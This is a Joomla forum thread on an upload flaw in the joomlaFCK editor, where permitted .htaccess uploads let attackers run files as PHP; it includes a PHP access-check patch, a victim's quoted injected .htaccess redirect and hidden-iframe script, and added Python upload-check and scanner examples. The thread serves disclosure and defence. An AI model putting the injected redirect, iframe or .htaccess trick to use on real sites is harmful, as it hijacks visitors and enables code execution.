Backdoor in joomlaFCK

For all non-Joomla! security issues, i.e. 3rd-party components etc.

pzotov
Joomla! Fledgling
Posts: 1
Joined: Mon Mar 20, 2006 4:52 pm
Location: Russia

Backdoor in joomlaFCK

Post by pzotov » Mon Aug 28, 2006 2:26 pm

Any user can upload files to your site.

joomlaFCK <= 1.1.5
http://www.site.com/mambots/editors/fck ... nector.php

joomlaFCK 1.2.0
http://www.site.com/mambots/editors/fck ... nector.php

joomlaFCK does not allow uploading .php files, but it does allow uploading .htaccess (with Type=File or Type=files). So an AddType directive in .htaccess allows any file to be run as PHP.

My solution:
File:
mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/config.php

After line 27 add:

Code:

// Added by Pavel V. Zotov 20060720
// Assumes Joomla's configuration.php has already been included above this
// point, so $mosConfig_absolute_path, $mosConfig_live_site and $database are set.
define( '_VALID_MOS', 1 );

// Joomla 1.0 backend group ids: 23 = Manager, 24 = Administrator, 25 = Super Administrator
$allowed_backend_groups = array( 23, 24, 25 );

require_once( $mosConfig_absolute_path."/globals.php" );
require_once( $mosConfig_absolute_path."/includes/joomla.php" );
// Attach to the administrator session (Joomla 1.0 names it md5 of the live site URL)
session_name( md5( $mosConfig_live_site ) );
session_start();
$mainframe = new mosMainFrame( $database, '', $mosConfig_absolute_path, 1 );
$my = $mainframe->initSessionAdmin( null, null );
// Refuse the connector to anyone not logged in to the backend in an allowed group
if( !in_array( $my->gid, $allowed_backend_groups ) ) {
    die( 'Restricted access' );
}
// end of addition by Pavel V. Zotov
So only a Super Administrator, Administrator or Manager (logged in to the backend) can use the file manager in joomlaFCK.

You should also disallow .htaccess.
Last edited by pzotov on Mon Aug 28, 2006 2:33 pm, edited 1 time in total.

smart
Joomla! Enthusiast
Posts: 109
Joined: Thu Aug 18, 2005 1:33 pm
Location: Sebastopol

Re: Backdoor in joomlaFCK

Post by smart » Mon Sep 04, 2006 8:31 am

pzotov wrote: joomlaFCK does not allow uploading .php files, but it does allow uploading .htaccess (with Type=File or Type=files). So an AddType directive in .htaccess allows any file to be run as PHP.
I wrote to Frederico Caldeira Knabben (FCKeditor author) and got this answer about the problem:

«Thanks for the advice. I'll add the htaccess to the list of denied extensions. Actually the real solution would be to set the list of allowed extensions instead, but I would have a lot of complaints regarding missing extensions there.»
Joomlaportal.ru News, articles and tutorials
Joomlaforum.ru Russian Joomla Support Forum
Member of the Russian Joomla Translation Team
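As an added illustration of the denylist-versus-allowlist point in the two posts above (this is example code written for this page, not joomlaFCK or FCKeditor code), the following Python puts a denylist check of the kind the thread describes next to an allowlist check. The denylist blocks .php but does not list .htaccess, so the .htaccess upload goes through; the allowlist refuses dotfiles, path components and double extensions outright. The extension lists, the Type= names and the sample file names are assumptions made for the example.

```python
"""Denylist vs allowlist upload checks.

Added illustration, not joomlaFCK or FCKeditor code.  The thread reports that
the connector's denylist blocked ".php" but let ".htaccess" through, and that
an AddType line in that file makes any later upload executable.  The denylist
below reproduces that gap; the allowlist (the approach the FCKeditor author
calls the real solution) closes it.  Both lists, the resource-type names and
the sample file names are assumptions made for this example.
"""
import os
import re

# Constructed denylist in the spirit of the old connector: script
# extensions are refused, ".htaccess" is simply not on the list.
DENYLIST = {"php", "php3", "php4", "php5", "phtml", "pl", "cgi", "asp", "aspx", "jsp"}

# Constructed allowlist keyed by the connector's Type= parameter.
ALLOWLIST_BY_TYPE = {
    "File":  {"pdf", "zip", "doc", "txt"},
    "Image": {"jpg", "jpeg", "png", "gif"},
    "Flash": {"swf"},
}

# A plain file name: starts with a letter or digit (so no dotfiles such as
# .htaccess), then only letters, digits, "_", "-" and ".".
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]*$")


def denylist_allows(filename: str) -> bool:
    """Old-style check: refuse only when the final extension is denylisted."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DENYLIST


def allowlist_allows(filename: str, resource_type: str) -> bool:
    """Hardened check: a plain name with exactly one extension, and that
    extension must be on the list for the requested resource type."""
    allowed = ALLOWLIST_BY_TYPE.get(resource_type)
    if allowed is None:
        return False                      # unknown or misspelt Type= value
    if os.path.basename(filename) != filename or not _SAFE_NAME.match(filename):
        return False                      # path components, dotfiles, odd characters
    parts = filename.split(".")
    if len(parts) != 2:
        return False                      # "shell.php.jpg", "shell.php.", "README"
    return parts[1].lower() in allowed


def classify(filename: str, resource_type: str = "File") -> dict:
    """Compare both policies on one name; handy when reviewing an upload log."""
    return {
        "denylist": denylist_allows(filename),
        "allowlist": allowlist_allows(filename, resource_type),
    }


if __name__ == "__main__":
    for name, rtype in [(".htaccess", "File"), ("shell.php", "File"),
                        ("shell.PhP", "File"), ("shell.php.jpg", "Image"),
                        ("shell.php.", "File"), ("photo.jpg", "Image")]:
        print(f"{name:14} {rtype:6} {classify(name, rtype)}")
```

The allowlist deliberately refuses names with more than one dot and names ending in a dot: which of several extensions a server honours depends on its handler configuration, so the only safe rule is to accept one known-good extension and nothing else.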

dparanhos
Joomla! Fledgling
Posts: 2
Joined: Thu Feb 07, 2013 4:23 pm

Re: Backdoor in joomlaFCK

Post by dparanhos » Thu Feb 07, 2013 4:51 pm

I can confirm this backdoor, as my website was hacked by it. It affects .htaccess and JavaScript files.
My website was based on Joomla 1.7.1 as of Jan 2013.

I will briefly describe what happened.

A few weeks after installing this JoomlaCK or JoomlaFCK plugin, when I tried to access my website it was instantly redirected to a malicious website.

I found that my root .htaccess file had these lines added automatically without my permission:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://gabriellerosephotography .com/emad.html?h=933119 [L,R]
</IfModule>

Also, many folders within administrator/modules had a brand new .htaccess file created, all containing the code above.

Another thing: all my custom JavaScript files had this line added:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography. com/emad.html?j=933119></iframe>');

I started checking the chronology of creation of these files, and I found out that the first .htaccess created was inside the JCKeditor plugin folder, so I suspected that this was the starting point. Also, the only plugin folder affected was this plugin's. Most of the folders affected were modules.

Searching the web about the JoomlaCK plugin editor backdoor, I found the topic above, which confirms to me exactly how my website was hacked.

Unfortunately I had to disable the plugin, even though it seems very useful. I don't know if this bug/backdoor is already fixed; I just would like to share here to prevent other websites being hacked, as I suspect this was the cause of the attack.
Last edited by mandville on Thu Feb 07, 2013 9:28 pm, edited 1 time in total.
Reason: broke links
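The post above gives two concrete indicators: an .htaccess block that redirects visitors to an external URL only when they arrive with an outside HTTP_REFERER (so the owner, who types the address directly, rarely sees it), and a document.write('<iframe ...>') with 2x2 dimensions appended to JavaScript files. The following Python scanner, added here as an example and not part of the thread or of any Joomla code, looks for both across a site tree. The file contents are constructed samples modelled on the post; malicious.example is a placeholder host, not the one in the post, and the 10px "tiny" threshold is an assumption.

```python
"""Scan a site tree for the two indicators described in the post above.

Added example, not part of the thread or of any Joomla code.  Indicators,
taken from the post: (1) an .htaccess whose RewriteRule sends the visitor to
an external URL, preceded by a RewriteCond on HTTP_REFERER so that only people
arriving from another site (search engines, links) are redirected, which is
why the owner rarely notices; (2) a document.write('<iframe ...>') appended
to JavaScript files, with tiny dimensions and an external src.  The file
contents below are constructed samples; malicious.example is a placeholder
host, not the one in the post.
"""
import os
import re

EXTERNAL_REWRITE = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://([^/\s]+)", re.I)
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
WRITTEN_IFRAME = re.compile(
    r"document\.write\s*\(\s*['\"]<iframe[^>]*src=['\"]?https?://([^/'\"\s>]+)[^>]*>", re.I)
DIMENSION = re.compile(r"\b(?:height|width)=['\"]?(\d+)", re.I)
TINY = 10  # assumption: an iframe at most 10px in both dimensions is meant to be invisible


def scan_htaccess(path, text):
    """Flag RewriteRules with an external target.  A RewriteCond on HTTP_REFERER
    applies only to the next RewriteRule, so the flag is reset after each rule."""
    findings, referer_gated = [], False
    for no, line in enumerate(text.splitlines(), 1):
        if REFERER_COND.match(line):
            referer_gated = True
        m = EXTERNAL_REWRITE.match(line)
        if m:
            rule = "htaccess_referer_redirect" if referer_gated else "htaccess_external_redirect"
            findings.append({"path": path, "line": no, "host": m.group(1), "rule": rule})
            referer_gated = False
    return findings


def scan_javascript(path, text):
    """Flag document.write'd iframes with an external src; tiny ones are the hidden kind."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = WRITTEN_IFRAME.search(line)
        if m:
            dims = [int(v) for v in DIMENSION.findall(m.group(0))]
            rule = "js_hidden_iframe" if dims and max(dims) <= TINY else "js_external_iframe"
            findings.append({"path": path, "line": no, "host": m.group(1), "rule": rule})
    return findings


def scan_files(files):
    """files: mapping of relative path -> text.  Returns findings sorted by path and line."""
    out = []
    for path, text in files.items():
        name = os.path.basename(path)
        if name == ".htaccess":
            out.extend(scan_htaccess(path, text))
        elif name.lower().endswith(".js"):
            out.extend(scan_javascript(path, text))
    return sorted(out, key=lambda f: (f["path"], f["line"]))


def scan_tree(root):
    """Same scan over a real document root, e.g. scan_tree('/var/www/html')."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n == ".htaccess" or n.lower().endswith(".js"):
                p = os.path.join(dirpath, n)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(p, root)] = fh.read()
    return scan_files(files)


# Constructed samples modelled on the post (placeholder host, same structure).
INJECTED_HTACCESS = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://malicious.example/emad.html?h=933119 [L,R]
</IfModule>
"""
CLEAN_HTACCESS = """RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule .* index.php [L]
"""
INJECTED_JS = ("document.write('<iframe name=Twitter scrolling=auto frameborder=no "
               "align=center height=2 width=2 src=http://malicious.example/emad.html?j=933119></iframe>');")
SAMPLE_FILES = {
    ".htaccess": CLEAN_HTACCESS + INJECTED_HTACCESS,                # block appended to the real file
    "administrator/modules/mod_menu/.htaccess": INJECTED_HTACCESS,  # new file where none belongs
    "components/clean/.htaccess": CLEAN_HTACCESS,
    "media/system/js/custom.js": "function init() {}\n" + INJECTED_JS + "\n",
    "templates/beez/js/embed.js":  # a legitimate, visible embed must not be reported as hidden
        "document.write('<iframe width=560 height=315 src=\"https://video.example/embed\"></iframe>');\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['rule']:28} {f['path']}:{f['line']}  -> {f['host']}")
```

Run scan_tree against a copy of the document root rather than the live site, and treat the list of hosts it returns as the starting point for checking logs, not as proof of where the attacker got in: as the reply below notes, the folder where a backdoor is found is not necessarily the folder it came through.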

brian
Joomla! Master
Posts: 11765
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK

Re: Backdoor in joomlaFCK

Post by brian » Thu Feb 07, 2013 5:11 pm

Joomla 1.7.1 is outdated and insecure. Just because you see the evidence of the hack in a specific extension's folder doesn't mean that it is the cause. If I was a naughty boy and had hacked your site and uploaded a backdoor, there is no way I would be as stupid as to leave the backdoor in a place that would let you identify the area of vulnerability. Instead I would hide it somewhere completely different, and probably at the end of the deepest directory I could find on the site.
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/

dparanhos
Joomla! Fledgling
Posts: 2
Joined: Thu Feb 07, 2013 4:23 pm

Re: Backdoor in joomlaFCK

Post by dparanhos » Wed Feb 20, 2013 12:13 pm

brian wrote: Joomla 1.7.1 is outdated and insecure. Just because you see the evidence of the hack in a specific extension's folder doesn't mean that it is the cause. If I was a naughty boy and had hacked your site and uploaded a backdoor, there is no way I would be as stupid as to leave the backdoor in a place that would let you identify the area of vulnerability. Instead I would hide it somewhere completely different, and probably at the end of the deepest directory I could find on the site.

Mr Brian,

You are right; probably the cause of the attack is not the extension itself. My conclusion was based only on the timeframe of contamination. Later I found many other folders further up with contaminated XSS files, as you suggested, including PHP, JavaScript and HTML files.

I updated Joomla to a fresh 2.5.9, after doing research on Joomla 1.7.1 core XSS vulnerabilities.
